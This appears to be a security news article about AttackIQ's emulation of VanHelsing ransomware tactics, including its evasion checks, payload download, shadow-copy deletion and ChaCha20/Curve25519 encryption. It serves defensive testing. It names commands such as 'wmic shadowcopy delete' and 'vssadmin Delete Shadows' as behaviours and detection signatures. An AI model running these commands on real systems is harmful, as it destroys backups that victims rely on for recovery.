Cybersecurity researchers at AttackIQ have meticulously emulated the intricate tactics, techniques, and procedures (TTPs) of the VanHelsing ransomware, a potent ransomware-as-a-service (RaaS) operation that surfaced in March 2025.
This cyber threat has rapidly gained notoriety within the cybercriminal underworld for its advanced cross-platform capabilities and aggressive double extortion model.
VanHelsing targets a wide array of systems, including Windows, Linux, BSD, ARM devices, and VMware ESXi environments, encrypting files with sophisticated algorithms like Curve25519 and ChaCha20, and appending the “.vanhelsing” extension to affected files.
Beyond encryption, it exfiltrates sensitive data, threatening to leak it on a public site if ransoms, demanded in Bitcoin, are not paid.
With a reported $5,000 entry deposit for affiliates who retain 80% of ransom payments, VanHelsing’s operation has already impacted five victims across the US, France, Italy, and Australia as of May 14, 2025, with data from three victims exposed on their leak site.
Unveiling a Sophisticated Cyber Threat
AttackIQ’s newly released attack graph, based on insights from CheckPoint’s March 23, 2025 report, meticulously replicates VanHelsing’s behavioral patterns to help organizations validate their security controls against this evolving threat.
The emulation covers critical stages of the ransomware’s attack chain, from initial access and discovery to file encryption and system impact.
During the initial phase, VanHelsing performs local system reconnaissance using techniques like Virtualization/Sandbox Evasion (T1497) via the IsDebuggerPresent API to avoid detection, alongside System Location Discovery (T1614) through calls like GetUserDefaultLCID to identify unintended targets.
It also employs Ingress Tool Transfer (T1105) to download malicious payloads, testing endpoint and network defenses.
In the impact stage, the ransomware inhibits recovery by deleting Volume Shadow Copies (T1490) using commands like “wmic shadowcopy delete,” scans for network shares (T1135), and encrypts files using a hybrid of ChaCha20 and Elliptic-curve Diffie-Hellman (ECDH) Curve 25519 (T1486).
Emulating Real-World Adversarial Behavior
AttackIQ’s simulation enables security teams to assess their detection and prevention pipelines against these real-world adversarial behaviors, offering actionable insights into vulnerabilities.
Furthermore, the platform recommends additional scenarios like lateral movement emulation via PAExec to extend testing capabilities, ensuring a comprehensive defense posture against opportunistic adversaries like VanHelsing that indiscriminately select targets.
This initiative by AttackIQ, a leader in Adversarial Exposure Validation (AEV) aligned with the Continuous Threat Exposure Management (CTEM) framework, underscores the urgency of proactive cybersecurity.
By providing tools to evaluate security control performance and offering detection signatures for malicious activities-such as PowerShell commands for payload downloads or “vssadmin Delete Shadows” for shadow copy deletion-their platform empowers organizations to mitigate risks using strategies like network intrusion prevention (M1031) and robust data backups (M1053).
As VanHelsing continues to evolve, such emulations are critical for bolstering defenses, ensuring that security teams can prioritize key techniques and continuously refine their response to this dangerous ransomware threat.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
